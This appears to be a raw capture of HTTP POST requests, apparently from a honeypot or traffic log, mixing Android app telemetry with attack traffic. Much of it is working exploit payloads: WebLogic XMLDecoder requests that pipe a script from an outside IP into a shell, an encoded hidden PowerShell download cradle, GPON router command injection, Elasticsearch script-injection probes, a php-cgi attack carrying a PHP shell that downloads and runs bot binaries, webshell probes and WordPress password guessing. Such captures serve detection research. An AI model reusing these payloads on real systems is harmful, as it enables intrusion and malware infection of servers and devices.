act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+264%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D
POST /_search?pretty HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:9200/_search?pretty
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: x.x.x.x:9200
Content-Length: 337
Cache-Control: no-cache
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {
"/etc/hosts": {
"script": "import java.util.*;\nimport java.io.*;\nnew BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"ver\").getInputStream())).readLine();"
}
}
}
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å {(Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î◊b*Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495511961471&chk=e3b1516f HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
E6UNxY+eYMUkRpJyVjrueKqEvgRnLyJ9//0s2OPMDko9kOSozHtYJ2dSnI/l/K+CEbsLlUOjazMQbWbLJYcDNN77VUdKbjZ6iXdOdTs2dCEDGeQRKeYUT7bahVEFhAn4Hlp9IEDNH5ZfYCLPF5FFdIJkDsxyFl8HV+hiPDE2qcA3NIvA+mcrfZ8tc4cjAtdEtKdLiNrZ4vLIgSccQsm5Ar3KdkGTNZZ4WI+YUuDIru961J3vOhopjX18IVv5iaJNnKafGjVg+wzjD7eCLtjqyJMZjjgNCDkbGdp3004bxULtsWKEG+5PyRf1a9TNbqSQw5FPaeML+3cii3TH6TmN7CFw1YGG5xuNmzcsw5HIAB0CDMKIP/vb
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://check.proxyradar.com/azenv.php?auth=149605644571&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /sysaid/rdslogs?rdsName=ai1eJl7OhMXkSXi HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 39
xúã»∂405u22Ú…À»ı(….0sru
.M3,ïƒ ¡
POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 510
POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1833
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://169.254.221.185:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://169.254.221.185:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://169.254.221.185:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://169.254.221.185:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://169.254.221.185:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://169.254.221.185:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://169.254.221.185:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://169.254.221.185:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
778284
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
b0c28feea804e51d9fb5feb92f406ec1
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 733247b121cb465c82e1f65970c22331_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA
A38: HSPA
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 892
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
QaJXxYnIYoyivQuCKoViQtgc8oNURNYyCvITk+KGXb8AelCvjSVSyTy0Z0L8zGkDg7G7qHQQNMDAO8PKe0FRBT7YGiZhIl7JWvgmZcufJKVqs923KijyWAov7xn1jAvoEiprQKLcyaoK393Sp/ZVcjoOvX2T7horG1NQSnYz9KAUVp5KiLPkNNkNUSNjOcYJNcb5/oQgrOqlY+VMBOBZwdEyc3sPuMcdftQjhFiCxiHLVsmXfSIAGLvoHiv8QviXhqAWQVGcHUknA9blM/zFpGhWGt6niaCHgvxtjyLo+D0TRH6tN1vOGoAOXOYAKkrLqZs38KpwrgVwoTp6gCPVXtNc9aqulgjk4zZJpnvDtHMnkhihVOc=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åt(ÛÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=admin&pwd=aaaa
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 25
Cache-Control: no-cache
log=admin&pwd=p@ssword123
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477852328450
X-Umeng-Sdk: Android/5.6.7 musical.ly%2F4.15.0+GT-N8013%2F6.0.1+4C6E14E635355D555E3144A6F51E9977
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
2b7
1.05559e28267e58eb4c1000012@0bd721cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0b58ñ‹fiÄ ∞ ·xúïíΩkAáá3wâá`Dv…!WX¨≈≠Û˝’ù!ƒhPØdvg6.ÓfiÜ[r´`´b'àç¯ó‰Ô∞ ÷ˆÇ{Ò-r®3’¿˚ŒÔyfi^fÙ ‰úkO“sÂñb‘L`á≈ò≈(8z˜È≈E”™åü?…ã‹Vvw7.˜Í<µE±ÿʱà%ÏnV’N·∑ ªœºÅµa‘a6î!ÎF13Üj3‰Ülæn1,Ã-l»∞aπ$ê!ÿ§»0i®2V¿´9Ô±ÂDx§¨„ôñíf9≈iÍœhâV6Ó*Ñ)\fiflö ˛ˆ§J}]Wì˛ƒO˚®Meq.«nRÂ∂Eåb‹ >\/µRóÓ){÷XÆmYÔçw¬√£◊flfièNfl∞≥uÔ&E∑·iËÁaÀèakÙ@Å®;ó7vñ@/¸~pı«‹YkøZ ]f·5D¥L1&É‘±l¿í4h$È@iÈ2≠qBΩ?øôµ-–©˝$∑\e…L£D¢D%s·€óÛívÓJ«ˇ¶+¸xRÆ¥ÈÚ¬/'ô]˚Kœ„∆–™uLpü1ΔîËflˇ\yÁt—"∫f?é·¢ÉèËhQ4Ä«&£ˇ1 ‡lÍh·‘Äü´›‚t@000021cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0000 f8bded51422f4e7c6a822334c318cacc
0
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue555
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
603613
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
dcd5c8a90ffd35732301eb864fbe8f8d
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=152389807181&a=PSCMN&i=1082781672&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
